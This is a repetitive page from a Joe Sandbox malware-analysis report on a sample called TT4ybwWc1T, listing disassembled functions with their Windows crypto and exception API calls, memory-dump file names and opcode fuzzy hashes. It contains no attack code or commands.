Associated: 00000000.00000002.1385787961.000000006C97E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385822311.000000006C980000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385918382.000000006C981000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385966714.000000006C983000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386217873.000000006C98E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c8e0000_TT4ybwWc1T.jbxd

Similarity

API ID: AcquireContextCryptErrorLast$ExceptionException@8RaiseThrow
String ID: CryptAcquireContext$Crypto++ RNG
API String ID: 3279666080-1159690233
Opcode ID: 597484c2786822c813822c6c56f20d73166b447092d4b17141085541f552fc39
Instruction ID: 959c4523173b86ccc30b2a8e38578d98a323356837f405e1b96a8e9804b126d8
Opcode Fuzzy Hash: 597484c2786822c813822c6c56f20d73166b447092d4b17141085541f552fc39
Instruction Fuzzy Hash: CD21F97125C310AFE310DF65CC55F5777F8AB9A744F10091EF14196AC0EBB5E0048B55

Uniqueness

Uniqueness Score: -1.00%

Function 6C94948B Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 6C94CE6C
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 6C94CE81
UnhandledExceptionFilter.KERNEL32(6C969428), ref: 6C94CE8C
GetCurrentProcess.KERNEL32(C0000409), ref: 6C94CEA8
TerminateProcess.KERNEL32(00000000), ref: 6C94CEAF

Memory Dump Source

Source File: 00000000.00000002.1384971621.000000006C8E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C8E0000, based on PE: true

Associated: 00000000.00000002.1384909940.000000006C8E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385630538.000000006C964000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385787961.000000006C97E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385822311.000000006C980000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385918382.000000006C981000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385966714.000000006C983000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386217873.000000006C98E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c8e0000_TT4ybwWc1T.jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID:
API String ID: 2579439406-0
Opcode ID: bae5f4b3e681f5a32085a0d70a0b2c723856267e7c5ce82de76e46a25861252b
Instruction ID: f5a1850ea4e2d31438e39a17937728cf2f12fc93722a29bf8c67a8f137239ea2
Opcode Fuzzy Hash: bae5f4b3e681f5a32085a0d70a0b2c723856267e7c5ce82de76e46a25861252b
Instruction Fuzzy Hash: 2221FCB4A0E214DFDB50DF69D894A843BF4FB0B308F38591AE50997B81E7B88984CF15

Uniqueness

Uniqueness Score: -1.00%

Function 6C942310 Relevance: 6.7, APIs: 4, Instructions: 663COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBCMT ref: 6C9424A1

Part of subcall function 6C94AC75: RaiseException.KERNEL32(?,?,6C949C34,65628154,?,?,?,?,6C949C34,65628154,6C979C90,6C98B974,65628154), ref: 6C94ACB7

std::exception::exception.LIBCMT ref: 6C94248C

Part of subcall function 6C949533: std::exception::_Copy_str.LIBCMT ref: 6C94954E

Memory Dump Source

Source File: 00000000.00000002.1384971621.000000006C8E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C8E0000, based on PE: true

Associated: 00000000.00000002.1384909940.000000006C8E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385630538.000000006C964000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385787961.000000006C97E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385822311.000000006C980000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385918382.000000006C981000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385966714.000000006C983000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386217873.000000006C98E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c8e0000_TT4ybwWc1T.jbxd

Similarity

API ID: Copy_strExceptionException@8RaiseThrowstd::exception::_std::exception::exception
String ID:
API String ID: 757275642-0
Opcode ID: 4481c5cceeed1af8b597fb0e0d2ad0a67291dbf464082f7d57b637296c3914a2
Instruction ID: 27870a13cecb14602ebc7a5f721d47b02b8a608f2de3e370547208ee36be1584
Opcode Fuzzy Hash: 4481c5cceeed1af8b597fb0e0d2ad0a67291dbf464082f7d57b637296c3914a2
Instruction Fuzzy Hash: 6D32A571A01A058FDB08CF98C494AAEB7B9FF99744F24812CE406DBB54EB30ED05CB90

Uniqueness

Uniqueness Score: -1.00%

Function 6C935DD0 Relevance: 6.4, APIs: 4, Instructions: 390COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1384971621.000000006C8E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C8E0000, based on PE: true

Associated: 00000000.00000002.1384909940.000000006C8E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385630538.000000006C964000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385787961.000000006C97E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385822311.000000006C980000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385918382.000000006C981000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385966714.000000006C983000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386217873.000000006C98E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c8e0000_TT4ybwWc1T.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 15d89f0015025c8f48ef289c58a4444b8ff2b3e759751989cff43e2ae1e855c0
Instruction ID: 71b7cd180fc467334b531189a2d59d5ebbd4123cef9356fd4c622fd1fbc6c31c
Opcode Fuzzy Hash: 15d89f0015025c8f48ef289c58a4444b8ff2b3e759751989cff43e2ae1e855c0
Instruction Fuzzy Hash: E502AA7061D3948FC745CF29C8A053EBBF1EBCB211F59090EE2FA97295C234A558CB25

Uniqueness

Uniqueness Score: -1.00%

Function 6C935EB9 Relevance: 6.3, APIs: 4, Instructions: 318COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 6C9362FC
_memmove.LIBCMT ref: 6C93632B
_memmove.LIBCMT ref: 6C93635A
_memmove.LIBCMT ref: 6C936389

Memory Dump Source

Source File: 00000000.00000002.1384971621.000000006C8E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C8E0000, based on PE: true

Associated: 00000000.00000002.1384909940.000000006C8E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385630538.000000006C964000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385787961.000000006C97E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385822311.000000006C980000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385918382.000000006C981000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385966714.000000006C983000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386217873.000000006C98E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c8e0000_TT4ybwWc1T.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: 0b4ea3fe3589d3c777212f0bf01e72413130ef2a81f41ed74e831cc4fe9d84c5
Instruction ID: 39db746c03c0daf847e55ec74fec3832edc29c2d14e25af0a89acfe31a6e23aa
Opcode Fuzzy Hash: 0b4ea3fe3589d3c777212f0bf01e72413130ef2a81f41ed74e831cc4fe9d84c5
Instruction Fuzzy Hash: 63E18C7051D3A5CBC745CF69C8A013E7BF1EBCB212F5A090EE1F6572A9D234A168CB25

Uniqueness

Uniqueness Score: -1.00%

Function 074E0930 Relevance: 5.3, Strings: 4, Instructions: 336COMMON

Download Yara Rule

Strings

HERE, xrefs: 074E09B6
Gq, xrefs: 074E0BBB
Gq, xrefs: 074E0D19
LOOK, xrefs: 074E09B1

Memory Dump Source

Source File: 00000000.00000002.1384617521.00000000074E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_74e0000_TT4ybwWc1T.jbxd

Similarity

API ID:
String ID: HERE$LOOK$Gq$Gq
API String ID: 0-4272282384
Opcode ID: 7528f482fbbed53674c297891c1d397ecbd506960a3ff031036addb717925e7d
Instruction ID: 155aaf541a04d88d8f1d101b22a508b50dcd03c69337d316e8f938a2f4893949
Opcode Fuzzy Hash: 7528f482fbbed53674c297891c1d397ecbd506960a3ff031036addb717925e7d
Instruction Fuzzy Hash: 15F1C1B4E402298FDB64CF69C984BDDB7F6BB48310F2085E6D418A7361DB709E818F50

Uniqueness

Uniqueness Score: -1.00%

Function 6C93DE00 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 57encryptionCOMMON

Download Yara Rule

APIs

CryptGenRandom.ADVAPI32(?,?,?,65628154,00000000), ref: 6C93DE6F
__CxxThrowException@8.LIBCMT ref: 6C93DEB9

Part of subcall function 6C93DD20: CryptReleaseContext.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,?,00000000,6C95F0E6,000000FF,6C93DF67,00000000,?), ref: 6C93DDB4

Strings

CryptGenRandom, xrefs: 6C93DE7B

Memory Dump Source

Source File: 00000000.00000002.1384971621.000000006C8E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C8E0000, based on PE: true

Associated: 00000000.00000002.1384909940.000000006C8E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385630538.000000006C964000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385787961.000000006C97E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385822311.000000006C980000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385918382.000000006C981000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385966714.000000006C983000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386217873.000000006C98E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c8e0000_TT4ybwWc1T.jbxd

Similarity

API ID: Crypt$ContextException@8RandomReleaseThrow
String ID: CryptGenRandom
API String ID: 1047471967-3616286655
Opcode ID: 1eba798c3d3fa4f6fc2c5dad27f82d797e5cf35459e5e59e76ea83823b568323
Instruction ID: 739ba9afb20f6a5f7fc0dd64521dd4c6bd8a497aea16dbef1c3f55595d877282
Opcode Fuzzy Hash: 1eba798c3d3fa4f6fc2c5dad27f82d797e5cf35459e5e59e76ea83823b568323
Instruction Fuzzy Hash: D421477111D3409FD704DF24C844B9ABBF8BB9A718F044A1EF4A593B80EB74E508CB92

Uniqueness

Uniqueness Score: -1.00%

Function 6C9363B0 Relevance: 5.1, APIs: 3, Instructions: 648COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 6C936437

Memory Dump Source

Source File: 00000000.00000002.1384971621.000000006C8E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C8E0000, based on PE: true

Associated: 00000000.00000002.1384909940.000000006C8E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385630538.000000006C964000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385787961.000000006C97E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385822311.000000006C980000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385918382.000000006C981000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385966714.000000006C983000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386217873.000000006C98E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c8e0000_TT4ybwWc1T.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: 10daa7d3549f7c4eb4ac52c032834d1e2389973eed718c25ac09790981bea2eb
Instruction ID: e48576499ac9588b8c5c6d8521b84e66e32d88e1b432b3665e9f02a813eb7fa5
Opcode Fuzzy Hash: 10daa7d3549f7c4eb4ac52c032834d1e2389973eed718c25ac09790981bea2eb
Instruction Fuzzy Hash: 0F5224712082658FD359CF2AC09052ABBF2EFCB311B54899ED4CA8B386D730F551CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 6C93D9D0 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 126COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000010,65628154,7568FC30,?,00000000), ref: 6C93DA1A

Part of subcall function 6C8E4010: std::_Xinvalid_argument.LIBCPMT ref: 6C8E402A

Strings

operation failed with error , xrefs: 6C93DA49
OS_Rng: , xrefs: 6C93DA35

Memory Dump Source

Source File: 00000000.00000002.1384971621.000000006C8E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C8E0000, based on PE: true

Associated: 00000000.00000002.1384909940.000000006C8E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385630538.000000006C964000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385787961.000000006C97E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385822311.000000006C980000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385918382.000000006C981000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385966714.000000006C983000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386217873.000000006C98E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c8e0000_TT4ybwWc1T.jbxd

Similarity

API ID: ErrorLastXinvalid_argumentstd::_
String ID: operation failed with error $OS_Rng:
API String ID: 406877150-700108173
Opcode ID: cd4bd8baff755df05a69d8713206160588b86366f80062f87b9495ab7095c8a2
Instruction ID: 82753d8efb030e00005dccd93de0e6fce8e30f4859864b5580e804982be11ae3
Opcode Fuzzy Hash: cd4bd8baff755df05a69d8713206160588b86366f80062f87b9495ab7095c8a2
Instruction Fuzzy Hash: 60415DB25083809FD320CF69C841B9BBBE8ABDA654F118D2EE18D87740DB75D508CB53

Uniqueness

Uniqueness Score: -1.00%

Function 6C941CA0 Relevance: 3.6, APIs: 2, Instructions: 619COMMON

Download Yara Rule

APIs

std::exception::exception.LIBCMT ref: 6C941E1D

Part of subcall function 6C949533: std::exception::_Copy_str.LIBCMT ref: 6C94954E

__CxxThrowException@8.LIBCMT ref: 6C941E32

Part of subcall function 6C94AC75: RaiseException.KERNEL32(?,?,6C949C34,65628154,?,?,?,?,6C949C34,65628154,6C979C90,6C98B974,65628154), ref: 6C94ACB7

Memory Dump Source

Source File: 00000000.00000002.1384971621.000000006C8E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C8E0000, based on PE: true

Associated: 00000000.00000002.1384909940.000000006C8E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385630538.000000006C964000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385787961.000000006C97E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385822311.000000006C980000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385918382.000000006C981000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385966714.000000006C983000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386217873.000000006C98E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c8e0000_TT4ybwWc1T.jbxd

Similarity

API ID: Copy_strExceptionException@8RaiseThrowstd::exception::_std::exception::exception
String ID:
API String ID: 757275642-0
Opcode ID: 75a9352f44c0fc000f0cbb063faa35e12511f829180fc518f488a58c8e1bcc1d
Instruction ID: e4b7d3e2a40ea4435464131c34dd2713b7f3be884d9a49cadf29631d564bf16a
Opcode Fuzzy Hash: 75a9352f44c0fc000f0cbb063faa35e12511f829180fc518f488a58c8e1bcc1d
Instruction Fuzzy Hash: 6232B271A016059FDB08CF98C8949AEB3BAFF99744B24C12DE516DBB54EB30ED04CB90

Uniqueness

Uniqueness Score: -1.00%

Function 6C950B89 Relevance: 2.1, APIs: 1, Instructions: 645COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1384971621.000000006C8E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C8E0000, based on PE: true

Associated: 00000000.00000002.1384909940.000000006C8E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385630538.000000006C964000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385787961.000000006C97E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385822311.000000006C980000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385918382.000000006C981000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385966714.000000006C983000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386217873.000000006C98E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c8e0000_TT4ybwWc1T.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 69496ac0b02ab6a25f9a300d1b37ca4767da8f8da73b0892110e4215636fe7c2
Instruction ID: 31d18e7540f7e8085972fa3f5bea065be992ad4e20bfbb86d1065b5e7661564c
Opcode Fuzzy Hash: 69496ac0b02ab6a25f9a300d1b37ca4767da8f8da73b0892110e4215636fe7c2
Instruction Fuzzy Hash: B232F622E69F414DE7239936C832335625CAFB73C8F65D72BF825B5E99EB29C4934100

Uniqueness

Uniqueness Score: -1.00%

Function 6C93DEE0 Relevance: 1.6, APIs: 1, Instructions: 71encryptionCOMMON

Download Yara Rule

APIs

Part of subcall function 6C8E4760: __CxxThrowException@8.LIBCMT ref: 6C8E47F9

CryptReleaseContext.ADVAPI32(?,00000000,00000000,?), ref: 6C93DF7B

Memory Dump Source

Source File: 00000000.00000002.1384971621.000000006C8E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C8E0000, based on PE: true

Associated: 00000000.00000002.1384909940.000000006C8E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385630538.000000006C964000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385787961.000000006C97E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385822311.000000006C980000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385918382.000000006C981000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385966714.000000006C983000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386217873.000000006C98E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c8e0000_TT4ybwWc1T.jbxd

Similarity

API ID: ContextCryptException@8ReleaseThrow
String ID:
API String ID: 3140249258-0
Opcode ID: d56ab31f8970c4cdcead7cb807df426cb931053da85d4eb4284d54994fb14865
Instruction ID: 9a88469ae3d71aa6d44143c977b6d798c47134c6bd03141199c7a6bec81f77bc
Opcode Fuzzy Hash: d56ab31f8970c4cdcead7cb807df426cb931053da85d4eb4284d54994fb14865
Instruction Fuzzy Hash: 4B21B0B651C354ABC300DF15C940B4BBBE8EBAA768F440A2DF84983781D771E508CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 6C93DD20 Relevance: 1.6, APIs: 1, Instructions: 66encryptionCOMMON

Download Yara Rule

APIs

CryptReleaseContext.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,?,00000000,6C95F0E6,000000FF,6C93DF67,00000000,?), ref: 6C93DDB4

Memory Dump Source

Source File: 00000000.00000002.1384971621.000000006C8E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C8E0000, based on PE: true

Associated: 00000000.00000002.1384909940.000000006C8E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385630538.000000006C964000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385787961.000000006C97E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385822311.000000006C980000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385918382.000000006C981000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385966714.000000006C983000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386217873.000000006C98E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c8e0000_TT4ybwWc1T.jbxd

Similarity

API ID: ContextCryptRelease
String ID:
API String ID: 829835001-0
Opcode ID: 20db084afafda5f4d712d57e6debdd161988b176c3f7d49e791bff42e9c69a29
Instruction ID: 3d0a191c8f842358e7a4328293f055e104197e8ece446c7a3b258887de61cecc
Opcode Fuzzy Hash: 20db084afafda5f4d712d57e6debdd161988b176c3f7d49e791bff42e9c69a29
Instruction Fuzzy Hash: 521106B27193609BE711CF18888075233F8EB06614F68092AE929C3F80EB75D4048791

Uniqueness

Uniqueness Score: -1.00%

Function 6C9635E0 Relevance: 1.5, APIs: 1, Instructions: 17encryptionCOMMON

Download Yara Rule

APIs

CryptReleaseContext.ADVAPI32(?,00000000), ref: 6C9635F5

Memory Dump Source

Source File: 00000000.00000002.1384971621.000000006C8E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C8E0000, based on PE: true

Associated: 00000000.00000002.1384909940.000000006C8E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385630538.000000006C964000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385787961.000000006C97E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385822311.000000006C980000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385918382.000000006C981000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385966714.000000006C983000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386217873.000000006C98E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c8e0000_TT4ybwWc1T.jbxd

Similarity

API ID: ContextCryptRelease
String ID:
API String ID: 829835001-0
Opcode ID: ce11da318b3382f00648236579ad9c1fc3e0c206f07854a55c87de7c28fa4ef3
Instruction ID: 3f8b1024b6ff83ebad38d3a5fe1d6bcd727c218356888fe03a1526c3bd3e46bc
Opcode Fuzzy Hash: ce11da318b3382f00648236579ad9c1fc3e0c206f07854a55c87de7c28fa4ef3
Instruction Fuzzy Hash: EFD05EB1606212A7FF20DA659D05B5632FC6B22294F2D0454E504C76C0DB60D4008B64

Uniqueness

Uniqueness Score: -1.00%

Function 6C93D7F0 Relevance: 1.5, APIs: 1, Instructions: 17encryptionCOMMON

Download Yara Rule

APIs

CryptReleaseContext.ADVAPI32(?,00000000), ref: 6C93D803

Memory Dump Source

Source File: 00000000.00000002.1384971621.000000006C8E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C8E0000, based on PE: true

Associated: 00000000.00000002.1384909940.000000006C8E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385630538.000000006C964000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385787961.000000006C97E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385822311.000000006C980000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385918382.000000006C981000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385966714.000000006C983000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386217873.000000006C98E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c8e0000_TT4ybwWc1T.jbxd

Similarity

API ID: ContextCryptRelease
String ID:
API String ID: 829835001-0
Opcode ID: 65596f4df142a4891b5f0dfe33df9e32f41669097802bb6e9bd08c3efde0502d
Instruction ID: f3cd9a0f53e3f357dff2df429e88d64db5bda61e9ab9eb34774c3b45f379bd96
Opcode Fuzzy Hash: 65596f4df142a4891b5f0dfe33df9e32f41669097802bb6e9bd08c3efde0502d
Instruction Fuzzy Hash: 75D05EF271632062E7209A549C15B8776DC4F21A48F26846EF99ED2B80D7B0E44587D9

Uniqueness

Uniqueness Score: -1.00%

Function 6C93D7D4 Relevance: 1.5, APIs: 1, Instructions: 9encryptionCOMMON

Download Yara Rule

APIs

CryptReleaseContext.ADVAPI32(?,00000000), ref: 6C93D7E0

Memory Dump Source

Source File: 00000000.00000002.1384971621.000000006C8E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C8E0000, based on PE: true

Associated: 00000000.00000002.1384909940.000000006C8E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385630538.000000006C964000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385787961.000000006C97E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385822311.000000006C980000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385918382.000000006C981000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385966714.000000006C983000.00000008.00000001.01000000.00000007.sdmpDownload File
